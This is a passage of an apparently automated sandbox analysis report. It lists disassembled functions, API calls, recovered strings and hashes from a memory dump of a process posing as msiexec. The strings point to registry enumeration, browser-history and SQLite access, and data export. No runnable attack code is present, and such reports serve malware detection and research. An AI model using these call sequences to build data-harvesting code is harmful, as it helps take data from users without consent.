                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                        • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                        • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                        • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                      • API String ID: 2618321458-3614832568
                                                                      • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                      • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                      • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                      • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: AttributesFilefreememset
                                                                      • String ID:
                                                                      • API String ID: 2507021081-0
                                                                      • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                      • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                      • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                      • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                      APIs
                                                                      • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                      • malloc.MSVCRT ref: 00417524
                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                      • free.MSVCRT ref: 00417544
                                                                      • free.MSVCRT ref: 00417562
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                      • String ID:
                                                                      • API String ID: 4131324427-0
                                                                      • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                      • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                      • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                      • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                      • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                      • free.MSVCRT ref: 0041822B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PathTemp$free
                                                                      • String ID: %s\etilqs_$etilqs_
                                                                      • API String ID: 924794160-1420421710
                                                                      • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                      • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                      • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                      • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040FDD5
                                                                        • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                      • _snwprintf.MSVCRT ref: 0040FE1F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                      • API String ID: 1775345501-2769808009
                                                                      • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                      • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                      • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                      • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastMessage_snwprintf
                                                                      • String ID: Error$Error %d: %s
                                                                      • API String ID: 313946961-1552265934
                                                                      • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                      • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                      • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                      • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: foreign key constraint failed$new$oid$old
                                                                      • API String ID: 0-1953309616
                                                                      • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                      • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                      • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                      • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                      APIs
                                                                      Strings
                                                                      • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                      • API String ID: 3510742995-272990098
                                                                      • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                      • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                      • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                      • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                      APIs
                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                        • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                        • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                      • memset.MSVCRT ref: 0040C439
                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                      • _wcsupr.MSVCRT ref: 0040C481
                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                      • memset.MSVCRT ref: 0040C4D0
                                                                      • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$EnumValuememset$_wcsuprmemcpywcslen
                                                                      • String ID:
                                                                      • API String ID: 1265369119-0
                                                                      • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                      • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                      • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                      • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0044A6EB
                                                                      • memset.MSVCRT ref: 0044A6FB
                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpymemset
                                                                      • String ID: gj
                                                                      • API String ID: 1297977491-4203073231
                                                                      • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                      • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                      • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                      • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                      APIs
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                      • free.MSVCRT ref: 0040E9D3
                                                                        • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@$free
                                                                      • String ID:
                                                                      • API String ID: 2241099983-0
                                                                      • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                      • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                      • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                      • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                      APIs
                                                                      • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                      • malloc.MSVCRT ref: 004174BD
                                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                      • free.MSVCRT ref: 004174E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                      • String ID:
                                                                      • API String ID: 4053608372-0
                                                                      • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                      • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                      • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                      • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 0040D453
                                                                      • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                      • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                      • String ID:
                                                                      • API String ID: 4247780290-0
                                                                      • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                      • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                      • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                      • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                      APIs
                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                      • memset.MSVCRT ref: 004450CD
                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                        • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                        • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                      • String ID:
                                                                      • API String ID: 1471605966-0
                                                                      • Opcode ID: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                      • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                      • Opcode Fuzzy Hash: 1d83234f6ed1c703cc9b29937d58b4133add7b8d770e5fab418e64e17a94a812
                                                                      • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                      APIs
                                                                      • wcscpy.MSVCRT ref: 0044475F
                                                                      • wcscat.MSVCRT ref: 0044476E
                                                                      • wcscat.MSVCRT ref: 0044477F
                                                                      • wcscat.MSVCRT ref: 0044478E
                                                                        • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                        • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                        • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                        • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                      • String ID: \StringFileInfo\
                                                                      • API String ID: 102104167-2245444037
                                                                      • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                      • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                      • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                      • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID:
                                                                      • API String ID: 613200358-0
                                                                      • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                      • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                      • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                      • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _memicmpwcslen
                                                                      • String ID: @@@@$History
                                                                      • API String ID: 1872909662-685208920
                                                                      • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                      • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                      • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                      • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                      APIs
                                                                      • memset.MSVCRT ref: 004100FB
                                                                      • memset.MSVCRT ref: 00410112
                                                                        • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                        • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                      • _snwprintf.MSVCRT ref: 00410141
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                      • String ID: </%s>
                                                                      • API String ID: 3400436232-259020660
                                                                      • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                      • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                      • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                      • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040D58D
                                                                      • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                      • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ChildEnumTextWindowWindowsmemset
                                                                      • String ID: caption
                                                                      • API String ID: 1523050162-4135340389
                                                                      • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                      • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                      • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                      • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                      APIs
                                                                        • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                        • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                      • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                      • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                      • String ID: MS Sans Serif
                                                                      • API String ID: 210187428-168460110
                                                                      • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                      • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                      • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                      • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ClassName_wcsicmpmemset
                                                                      • String ID: edit
                                                                      • API String ID: 2747424523-2167791130
                                                                      • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                      • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                                      • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                                      • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                                      APIs
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                                      • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                      • String ID: SHAutoComplete$shlwapi.dll
                                                                      • API String ID: 3150196962-1506664499
                                                                      • Opcode ID: f85e078d83ee4b6a7c1ac654ef6ef145b152188525821ebe08f3a3668eb7daf4
